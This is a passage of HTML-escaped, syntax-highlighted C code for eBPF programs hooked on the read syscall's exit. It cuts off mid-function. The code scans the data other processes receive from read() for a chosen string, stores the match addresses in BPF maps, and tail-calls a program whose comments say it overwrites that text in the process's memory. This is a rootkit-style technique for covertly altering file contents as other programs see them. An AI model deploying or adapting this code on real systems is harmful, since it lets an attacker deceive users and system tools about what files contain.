    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;pbuff_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_buff_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pbuff_addr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;buff_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;pbuff_addr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;name_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buff_addr&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// This is amount of data returned from the read syscall&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;buff_size&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;read_size&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;buff_size&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[TEXT_REPLACE] PID %d | read_size %lu | buff_addr 0x%lx&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;read_size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;buff_addr&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="c1"&gt;// 64 may be to large for loop&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;local_buff&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;LOCAL_BUFF_SIZE&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="mh"&gt;0x00&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;read_size&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;LOCAL_BUFF_SIZE&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;// Need to loop :-(&lt;/span&gt;
        &lt;span class="n"&gt;read_size&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;LOCAL_BUFF_SIZE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Read the data returned in chunks, and note every instance&lt;/span&gt;
    &lt;span class="c1"&gt;// of the first character of our 'to find' text.&lt;/span&gt;
    &lt;span class="c1"&gt;// This is all very convoluted, but is required to keep&lt;/span&gt;
    &lt;span class="c1"&gt;// the program complexity and size low enough the pass the verifier checks&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;tofind_counter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;loop_size&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;// Read in chunks from buffer&lt;/span&gt;
        &lt;span class="n"&gt;bpf_probe_read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;local_buff&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;read_size&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;buff_addr&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;LOCAL_BUFF_SIZE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="c1"&gt;// Look for the first char of our 'to find' text&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;local_buff&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;text_find&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;name_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;buff_addr&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="c1"&gt;// This is possibly out text, add the address to the map to be&lt;/span&gt;
                &lt;span class="c1"&gt;// checked by program 'check_possible_addrs'&lt;/span&gt;
                &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_name_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tofind_counter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;name_addr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_ANY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                &lt;span class="n"&gt;tofind_counter&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="n"&gt;buff_addr&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;LOCAL_BUFF_SIZE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// Tail-call into 'check_possible_addrs' to loop over possible addresses&lt;/span&gt;
    &lt;span class="n"&gt;bpf_printk&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"[TEXT_REPLACE] PID %d | tofind_counter %d &lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tofind_counter&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="n"&gt;bpf_tail_call&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_prog_array&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PROG_01&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tp/syscalls/sys_exit_read"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;check_possible_addresses&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;trace_event_raw_sys_exit&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Check this open call is opening our target file&lt;/span&gt;
    &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;pbuff_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_buff_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pbuff_addr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;pName_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;name_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;newline_counter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;match_counter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;text_len_max&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;old&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;name_len&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;text_len&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name_len&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name_len&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;text_len_max&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="c1"&gt;// Go over every possibly location&lt;/span&gt;
    &lt;span class="c1"&gt;// and check if it really does match our text&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;MAX_POSSIBLE_ADDRS&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;newline_counter&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;pName_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_name_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;newline_counter&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pName_addr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;name_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;pName_addr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name_addr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;bpf_probe_read_user&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;text_len_max&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;name_addr&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="c1"&gt;// for (j = 0; j &amp;lt; text_len_max; j++) {&lt;/span&gt;
        &lt;span class="c1"&gt;//     if (name[j] != text_find[j]) {&lt;/span&gt;
        &lt;span class="c1"&gt;//         break;&lt;/span&gt;
        &lt;span class="c1"&gt;//     }&lt;/span&gt;
        &lt;span class="c1"&gt;// }&lt;/span&gt;
        &lt;span class="c1"&gt;// we can use bpf_strncmp here,&lt;/span&gt;
        &lt;span class="c1"&gt;// but it's not available in the kernel version older than 5.17&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;bpf_strncmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;text_len_max&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;text_find&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="c1"&gt;// ***********&lt;/span&gt;
            &lt;span class="c1"&gt;// We've found out text!&lt;/span&gt;
            &lt;span class="c1"&gt;// Add location to map to be overwritten&lt;/span&gt;
            &lt;span class="c1"&gt;// ***********&lt;/span&gt;
            &lt;span class="n"&gt;bpf_map_update_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_to_replace_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;match_counter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;name_addr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_ANY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="n"&gt;match_counter&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;bpf_map_delete_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_name_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;newline_counter&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="c1"&gt;// If we found at least one match, jump into program to overwrite text&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;match_counter&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;bpf_tail_call&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_prog_array&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;PROG_02&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"tp/syscalls/sys_exit_read"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;overwrite_addresses&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;trace_event_raw_sys_exit&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Check this open call is opening our target file&lt;/span&gt;
    &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;pid_tgid&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_current_pid_tgid&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="kt"&gt;unsigned&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;pbuff_addr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;map_buff_addrs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pid_tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
